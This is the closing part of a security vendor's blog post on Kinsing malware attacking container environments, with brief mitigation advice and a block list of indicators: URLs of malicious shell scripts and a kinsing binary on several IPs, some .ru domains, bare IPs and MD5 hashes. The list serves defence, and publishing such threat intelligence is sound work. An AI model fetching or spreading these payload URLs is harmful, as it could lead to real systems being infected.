<li>Investigate logs, mostly around user actions, look for actions you can’t account for anomalies.</li>
<li>Form a security strategy where you can <a href="/cloud-native-security-drift-prevention" rel="noopener" target="_blank">enforce your policies</a> with ease, consider using <a href="https://www.aquasec.com/products/aqua-cloud-native-security-platform/" rel="noopener" target="_blank">cloud security tools</a> that will widen your scope and reach within your cloud resources.</li>
</ol>
<table border="0" cellpadding="4" style="width: 100%; margin-left: auto; margin-right: auto; border-color: #99acc2; border-style: none; border-collapse: collapse; table-layout: fixed;">
<tbody>
<tr>
<td style="width: 100%; background-color: #eeeeee;">
<p><span style="color: #ff0201;"><strong>We encourage you to block access to the following IOC’s-URL’s:</strong></span></p>
<p><span style="font-family: 'courier new', courier; color: #2e3e50;">http://142.44.191.122/d.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://142.44.191.122/kinsing/</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://142.44.191.122/al.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://142.44.191.122/cron.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://142.44.191.122/</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://142.44.191.122/kinsing</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://142.44.191.122/ex.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://185.92.74.42/w.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://185.92.74.42/d.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.24/d.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/kinsing</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/j.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/t.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/spr.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/spre.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/p.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/Application.jar</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://217.12.221.244/f.sh</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://www.traffclick.ru/</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://www.mechta-dachnika-tut.ru/</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://www.rus-wintrillions-com.ru/</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://rus-wintrillions-com.ru/</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">http://stroitelnye-jekologicheskie-materialy2016.ru</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">45.10.88.102</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">91.215.169.111</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">193.33.87.219</span><br><br><span style="font-family: 'courier new', courier; color: #2e3e50;">MD5s:</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">kinsing - 0d3b26a8c65cf25356399cc5936a7210</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">kinsing - 6bffa50350be7234071814181277ae79</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">kinsing - c4be7a3abc9f180d997dbb93937926ad</span><br><span style="font-family: 'courier new', courier; color: #2e3e50;">kdevtmpfsi - d9011709dd3da2649ed30bf2be52b99e</span></p>
</td>
</tr>
</tbody>
</table>
<p>&nbsp;</p></span>
            </div>
          
          <div id="hubspot-author_data" class="hubspot-editable" data-hubspot-form-id="author_data" data-hubspot-name="Blog Author">
            
               
            
            
            

                
                  <div class="hs-author-profile  hs-author-profile-with-avatar">
                     <div class="hs-author-avatar"> <img src="https://blog.aquasec.com/hubfs/Gal%20Singer.jpg" alt="Picture of Gal Singer"> </div> 
                    <a href="/author/gal-singer"><h4 class="hs-author-name">Gal Singer</h4></a>
                    <div class="hs-author-bio">Gal is a Security Researcher at Aqua. As part of the Aqua research team, his work focuses on researching vulnerabilities in Kubernetes and Networking around the cloud native world. When not at work, he likes going to music concerts and spending time at the beach with his friends.</div>
                    
                      <div class="hs-author-social-section">
                        
                        <div class="hs-author-social-links">
                          
                          
                            <a href="https://il.linkedin.com/in/gal-singer-3626a5125" target="_blank" class="hs-author-social-link hs-social-linkedin"> </a>
                          
                          
                          
                        </div>
                      </div>
                    
                  </div>
                  
                

             </div>
          
          
            
                 <p id="hubspot-topic_data">
                    
                        <a class="topic-link" href="https://blog.aquasec.com/topic/security-threats">Security Threats</a>,
                    
                        <a class="topic-link" href="https://blog.aquasec.com/topic/container-vulnerability">Container Vulnerability</a>,
                    
                        <a class="topic-link" href="https://blog.aquasec.com/topic/cloud-native-security">Cloud Native Security</a>,
                    
                        <a class="topic-link" href="https://blog.aquasec.com/topic/malware-attacks">Malware Attacks</a>
                    
                 </p>
            
            <div class="social-sharing-wrapper">
                <span id="hs_cos_wrapper_blog_social_sharing" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_blog_social_sharing" style="" data-hs-cos-general-type="widget" data-hs-cos-type="blog_social_sharing">
<div class="hs-blog-social-share">
    <ul class="hs-blog-social-share-list">
        
        <li class="hs-blog-social-share-item hs-blog-social-share-item-twitter">
            <!-- Twitter social share -->
            <a href="https://twitter.com/share" class="twitter-share-button" data-lang="en" data-url="https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability" data-size="medium" data-text="Threat Alert: Kinsing Malware Attacks Targeting Container Environments">Tweet</a>
        </li>
        

        
        <li class="hs-blog-social-share-item hs-blog-social-share-item-linkedin">
            <!-- LinkedIn social share -->
            <script type="IN/Share" data-url="https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability" data-showzero="true" data-counter="right"></script>
        </li>
        

        
        <li class="hs-blog-social-share-item hs-blog-social-share-item-facebook">
            <!-- Facebook share -->
            <div class="fb-like" data-href="https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability" data-layout="button" data-action="like" data-show-faces="false" data-share="true" data-width="120"></div>
        </li>
        
    </ul>
 </div>

</span>
            </div>
        </div>
    </div>
</div>


</div>

</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-4 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-raw_html " style="" data-widget-type="raw_html" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_1490700955681800" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_raw_html" style="" data-hs-cos-general-type="widget" data-hs-cos-type="raw_html"><div id="trd-articleslideshow"></div></span>
</div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-5 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-blog_comments " style="" data-widget-type="blog_comments" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_blog_comments" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_blog_comments" style="" data-hs-cos-general-type="widget" data-hs-cos-type="blog_comments">
<div class="section post-footer">
    <div id="comments-listing" class="new-comments"></div>
    
      <div id="hs_form_target_bcc43e1c-30ef-4ea4-9582-44bff8d5ad4c"></div>
      
      
      
    
</div>

</span></div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-6 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-raw_jinja social_floats_custom" style="" data-widget-type="raw_jinja" data-x="0" data-w="12">
<style type="text/css">
  .blog-content {position:relative;}
  
	.social_float_wrap {display:block;position:absolute;left:-60px;top:220px;opacity:0;transition:opacity 0.3s ease;}
	.social_float_wrap.float_fixed {position:fixed;left:initial;margin-left:-60px;opacity:1;}
	.social_float_wrap .social_float {}
	.social_float_wrap .social_float .social_float_link {display:block;width:40px;height:40px;background-size:40px 40px;background-color:#ffffff;border:2px solid #1904da;border-radius:50%;transition:all 0.3s ease;margin-bottom:8px;}
	.social_float_wrap .social_float .social_float_link:hover {background-color:#1904da;}
	.social_float_wrap .social_float .social_float_link svg {fill:#1904da;transition:background-color 0.3s ease;}
	.social_float_wrap .social_float .social_float_link:hover svg {fill:#ffffff;}
  
</style>

<script type="text/javascript">
jQuery(document).ready(function($) {

  var fixedSocialBtns = $('.social_float_wrap')[0].offsetTop;
  $(document).bind('ready scroll',function() {
    var docScroll = $(document).scrollTop();
    if(docScroll >= fixedSocialBtns) {
      $('.social_float_wrap').addClass('float_fixed');
    } else {
      $('.social_float_wrap').removeClass('float_fixed');
    }
  });
  
  $('.social_float a').click(function() {
    window.open($(this).attr('href'),'title', 'toolbar=no,scrollbars=no,resizable=yes,width=600,height=580');
    return false;
  });


});
  
</script>

<div class="social_float_wrap">
  <div class="social_float">
    <a target="_blank" href="http://www.facebook.com/sharer/sharer.php?u=https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability" class="social_float_link facebook"><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 32 32"><path d="M13.69,24.903h3.679V15.999h2.454l.325-3.068H17.369l.004-1.536c0-.8.076-1.229,1.224-1.229h1.534V7.097H17.676c-2.949,0-3.986,1.489-3.986,3.992v1.842H11.852V16H13.69Z" /></svg></a>
    <a target="_blank" href="http://twitter.com/share?url=https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability&amp;text=Threat%20Alert:%20Kinsing%20Malware%20Attacks%20Targeting%20Container%20Environments" class="social_float_link twitter"><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 32 32"><path d="M18.226,8.886a3.68371,3.68371,0,0,0-2.481,3.704l.038.63-.636-.077a10.34519,10.34519,0,0,1-6.056-2.984l-.84-.836-.215.617a3.71807,3.71807,0,0,0,.789,3.808c.509.54.394.617-.483.296a1.48373,1.48373,0,0,0-.598-.141,4.61571,4.61571,0,0,0,.458,1.724,4.11357,4.11357,0,0,0,1.743,1.647l.624.296-.739.011c-.712,0-.738.013-.661.284a3.84668,3.84668,0,0,0,2.379,2.11l.789.27-.687.412a7.122,7.122,0,0,1-3.41.951,3.75229,3.75229,0,0,0-1.044.103,9.7499,9.7499,0,0,0,2.455,1.132,10.73645,10.73645,0,0,0,8.346-.952,11.17993,11.17993,0,0,0,4.237-4.992,13.25968,13.25968,0,0,0,.865-3.858c0-.592.038-.669.75-1.376a8.556,8.556,0,0,0,.891-.99c.128-.245.114-.245-.534-.026-1.081.386-1.234.335-.699-.244a3.75511,3.75511,0,0,0,.865-1.376c0-.038-.191.026-.407.141a6.97889,6.97889,0,0,1-1.12.437l-.687.219L21.535,9.4a5.18982,5.18982,0,0,0-1.081-.566A4.34487,4.34487,0,0,0,18.226,8.886Z" /></svg></a>
    <a target="_blank" href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability&amp;title=Threat%20Alert:%20Kinsing%20Malware%20Attacks%20Targeting%20Container%20Environments" class="social_float_link linkedin"><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 32 32"><path d="M24.299,22.932V16.795c0-3.288-1.755-4.818-4.096-4.818a3.52865,3.52865,0,0,0-3.206,1.768V12.228H13.439c.047,1.005,0,10.704,0,10.704h3.558V16.954a2.43146,2.43146,0,0,1,.117-.867,1.94665,1.94665,0,0,1,1.825-1.301c1.288,0,1.803.981,1.803,2.42v5.727l3.557-.001ZM9.69,10.767a1.8553,1.8553,0,1,0,.023-3.699,1.85409,1.85409,0,1,0-.045,3.698H9.69Zm1.779,12.165V12.228H7.912V22.932Z" /></svg></a>
  </div>
</div>
</div><!--end widget-span -->

</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
<div class="span3 widget-span widget-type-cell blog-sidebar" style="" data-widget-type="cell" data-x="9" data-w="3">

<div class="row-fluid-wrapper row-depth-1 row-number-7 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-blog_subscribe " style="" data-widget-type="blog_subscribe" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_14538258496742317" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_blog_subscribe" style="" data-hs-cos-general-type="widget" data-hs-cos-type="blog_subscribe"><h3 id="hs_cos_wrapper_module_14538258496742317_title" class="hs_cos_wrapper form-title" data-hs-cos-general-type="widget_field" data-hs-cos-type="text">Subscribe to Email Updates</h3>

<div id="hs_form_target_module_14538258496742317_1"></div>



</span></div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-8 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-custom_widget " style="" data-widget-type="custom_widget" data-x="0" data-w="12">
<div id="hs_cos_wrapper_module_1550141167854489" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module widget-type-post_listing" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module">
  


<span id="hs_cos_wrapper_module_1550141167854489_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_post_listing" style="" data-hs-cos-general-type="widget" data-hs-cos-type="post_listing"><div class="block">
  <h3>Popular Posts</h3>
  <div class="widget-module">
    <ul class="hs-hash-1248747767-1640191865846">
    </ul>
  </div>
</div>
</span></div>

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-9 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-post_filter " style="" data-widget-type="post_filter" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_146324971355825147" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_post_filter" style="" data-hs-cos-general-type="widget" data-hs-cos-type="post_filter"><div class="block">
  <h3>Filter by Topic</h3>
  <div class="widget-module">
    <ul>
      
        <li>
          <a href="https://blog.aquasec.com/topic/container-security">Container Security <span class="filter-link-count" dir="ltr">(96)</span></a>
        </li>
      
        <li>
          <a href="https://blog.aquasec.com/topic/kubernetes-security">Kubernetes Security <span class="filter-link-count" dir="ltr">(76)</span></a>
        </li>
      
        <li>
          <a href="https://blog.aquasec.com/topic/cloud-native-security">Cloud Native Security <span class="filter-link-count" dir="ltr">(46)</span></a>
        </li>
      
        <li>
          <a href="https://blog.aquasec.com/topic/image-vulnerability-scanning">Image Vulnerability Scanning <span class="filter-link-count" dir="ltr">(43)</span></a>
        </li>
      
        <li>
          <a href="https://blog.aquasec.com/topic/security-threats">Security Threats <span class="filter-link-count" dir="ltr">(38)</span></a>
        </li>
      
        <li>
          <a href="https://blog.aquasec.com/topic/docker-security">Docker Security <span class="filter-link-count" dir="ltr">(35)</span></a>
        </li>
      
        <li>
          <a href="https://blog.aquasec.com/topic/open-source">Open Source <span class="filter-link-count" dir="ltr">(31)</span></a>
        </li>
      
        <li>
          <a href="https://blog.aquasec.com/topic/aws-security">AWS Security <span class="filter-link-count" dir="ltr">(28)</span></a>
        </li>
      
        <li>
          <a href="https://blog.aquasec.com/topic/runtime-security">Runtime Security <span class="filter-link-count" dir="ltr">(28)</span></a>
        </li>
      
        <li>
          <a href="https://blog.aquasec.com/topic/vulnerability-management">Vulnerability Management <span class="filter-link-count" dir="ltr">(25)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/container-vulnerability">Container Vulnerability <span class="filter-link-count" dir="ltr">(23)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/cloud-native-computing">Cloud Native Computing <span class="filter-link-count" dir="ltr">(22)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/cloud-security-cspm">Cloud Security CSPM <span class="filter-link-count" dir="ltr">(20)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/devsecops">DevSecOps <span class="filter-link-count" dir="ltr">(20)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/compliance">Compliance <span class="filter-link-count" dir="ltr">(19)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/ci-cd">CI/CD <span class="filter-link-count" dir="ltr">(11)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/secrets">Secrets <span class="filter-link-count" dir="ltr">(11)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/application-security">Application Security <span class="filter-link-count" dir="ltr">(10)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/serverless-security">Serverless-Security <span class="filter-link-count" dir="ltr">(10)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/host-security">Host Security <span class="filter-link-count" dir="ltr">(9)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/dynamic-container-analysis">Dynamic Container Analysis <span class="filter-link-count" dir="ltr">(7)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/fargate">Fargate <span class="filter-link-count" dir="ltr">(7)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/hybrid-cloud-security">Hybrid Cloud Security <span class="filter-link-count" dir="ltr">(7)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/ebpf">ebpf <span class="filter-link-count" dir="ltr">(7)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/events-and-conferences">Events and Conferences <span class="filter-link-count" dir="ltr">(6)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/google-cloud-platform">Google Cloud Platform <span class="filter-link-count" dir="ltr">(6)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/openshift">OpenShift <span class="filter-link-count" dir="ltr">(6)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/attack-vector">Attack Vector <span class="filter-link-count" dir="ltr">(5)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/azure-containers">Azure Containers <span class="filter-link-count" dir="ltr">(5)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/cloud-operations">Cloud Operations <span class="filter-link-count" dir="ltr">(5)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/container-tools">Container Tools <span class="filter-link-count" dir="ltr">(5)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/dockercon">DockerCon <span class="filter-link-count" dir="ltr">(5)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/security-automation">Security Automation <span class="filter-link-count" dir="ltr">(5)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/supply-chain-attacks">Supply Chain Attacks <span class="filter-link-count" dir="ltr">(5)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/virtualized-containers">Virtualized Containers <span class="filter-link-count" dir="ltr">(5)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/azure-cloud">Azure Cloud <span class="filter-link-count" dir="ltr">(4)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/cloud-workload-protection-platform-cwpp">Cloud Workload Protection Platform CWPP <span class="filter-link-count" dir="ltr">(4)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/microservices">Microservices <span class="filter-link-count" dir="ltr">(4)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/nano-segmentation">Nano-Segmentation <span class="filter-link-count" dir="ltr">(4)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/orchestration">Orchestration <span class="filter-link-count" dir="ltr">(4)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/service-mesh">Service Mesh <span class="filter-link-count" dir="ltr">(4)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/windows-containers">Windows Containers <span class="filter-link-count" dir="ltr">(4)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/aqua-security">Aqua Security <span class="filter-link-count" dir="ltr">(3)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/container-deployment">Container Deployment <span class="filter-link-count" dir="ltr">(3)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/ibm-cloud">IBM Cloud <span class="filter-link-count" dir="ltr">(3)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/network">Network <span class="filter-link-count" dir="ltr">(3)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/pivotal">Pivotal <span class="filter-link-count" dir="ltr">(3)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/secure-vm">Secure-vm <span class="filter-link-count" dir="ltr">(3)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/security-policy">Security Policy <span class="filter-link-count" dir="ltr">(3)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/thin-os">Thin OS <span class="filter-link-count" dir="ltr">(3)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/case-study">Case Study <span class="filter-link-count" dir="ltr">(2)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/eks">EKS <span class="filter-link-count" dir="ltr">(2)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/faas">FaaS <span class="filter-link-count" dir="ltr">(2)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/infrastructure-as-code-iac">Infrastructure-as-Code (IaC) <span class="filter-link-count" dir="ltr">(2)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/integration">Integration <span class="filter-link-count" dir="ltr">(2)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/malware-attacks">Malware Attacks <span class="filter-link-count" dir="ltr">(2)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/multi-tenancy">Multi-tenancy <span class="filter-link-count" dir="ltr">(2)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/network-firewall">Network Firewall <span class="filter-link-count" dir="ltr">(2)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/vmware">VMware <span class="filter-link-count" dir="ltr">(2)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/advanced-threat-mitigation">Advanced Threat Mitigation <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/cnapp">CNAPP <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/cisco">Cisco <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/cloud-native-application-protection-platform">Cloud Native Application Protection Platform <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/cloud-vm">Cloud VM <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/container-influencers">Container Influencers <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/data-protection">Data Protection <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/drift-prevention">Drift Prevention <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/dynamic-threat-analysis">Dynamic Threat Analysis <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/eks-security">EKS Security <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/iot">IoT <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/kubernetes-authorization">Kubernetes Authorization <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/machine-learning">Machine Learning <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/management-platform">Management Platform <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/mesosphere">Mesosphere <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/microsoft">Microsoft <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/moby">Moby <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/seccomp-demo">Seccomp Demo <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/user-namespace">User Namespace <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/vpc">VPC <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
        <li style="display:none;">
          <a href="https://blog.aquasec.com/topic/wiki">Wiki <span class="filter-link-count" dir="ltr">(1)</span></a>
        </li>
      
    </ul>
    
      <a class="filter-expand-link" href="#">Show more...</a>
    
  </div>
</div>
</span></div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

    </div><!--end body -->
</div><!--end body wrapper -->

<div class="footer-container-wrapper">
    <div class="footer-container container-fluid">

<div class="row-fluid-wrapper row-depth-1 row-number-1 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-raw_jinja " style="" data-widget-type="raw_jinja" data-x="0" data-w="12">
<script type="application/ld+json">
 {
     "@context": "http://schema.org",
     "@type": "BlogPosting",
     "headline": "Threat Alert: Kinsing Malware Attacks Targeting Container Environments",
     "image": {
          "@type": "ImageObject",
          "url": "https://cdn2.hubspot.net/hubfs/1665891/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg"
     },
     "datePublished": "2020-04-03 12:00:00",
     "dateModified": "November 17, 2020, 10:53:05",
     "author": {
         "@type": "Person",
         "name": "Gal Singer"
     },
     "publisher": {
         "@type": "Organization",
         "name": "Aqua Security",
         "logo": {
             "@type": "ImageObject",
             "url": "https://f.hubspotusercontent40.net/hubfs/1665891/SVG__2020%20Aqua%20Logo%20Color.svg"
         }
     },
     "description": "An ambitious attack campaign directed by resourceful actors targeting misconfigured container environments, stands out with thousands of attempts on a daily basis"
 }
 </script></div><!--end widget-span -->

</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-2 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-global_group " style="" data-widget-type="global_group" data-x="0" data-w="12">
<div class="" data-global-widget-path="generated_global_groups/7516015189.html"><div class="row-fluid-wrapper row-depth-1 row-number-1 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-custom_widget " style="" data-widget-type="custom_widget" data-x="0" data-w="12">
<div id="hs_cos_wrapper_module_153895222154164" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><div class="container-fluid footer_wrap">
<div class="page-center footer_widgets_wrap">
<div class="span5 footer_1">
<div class="row">
<a class="footer_logo" href="https://www.aquasec.com" title="Aqua Container Security">Aqua Container Security</a>
</div>
<div class="row">
<ul>
<div id="text-2" class="widget widget_text">			
<div class="textwidget"><p>Aqua Security is the largest pure-play cloud native security&nbsp;company, providing customers the freedom to innovate and accelerate their digital transformations. The Aqua Platform provides prevention, detection, and response automation across the entire application lifecycle to secure the build, secure cloud infrastructure and secure running workloads, wherever they are deployed.</p>
<p>Aqua customers are among the world’s largest enterprises in financial services, software, media,&nbsp;manufacturing&nbsp;and retail, with implementations across a broad range of cloud providers and modern technology stacks spanning containers, serverless functions and cloud VMs. </p>
</div>
</div>
</ul>
</div>
<div class="row-fluid social_links_wrap">
<a href="https://www.facebook.com/AquaSecTeam" class="social_link facebook" target="_blank" title="facebook"></a>
<a href="https://twitter.com/AquaSecTeam" class="social_link twitter" target="_blank" title="twitter"></a>
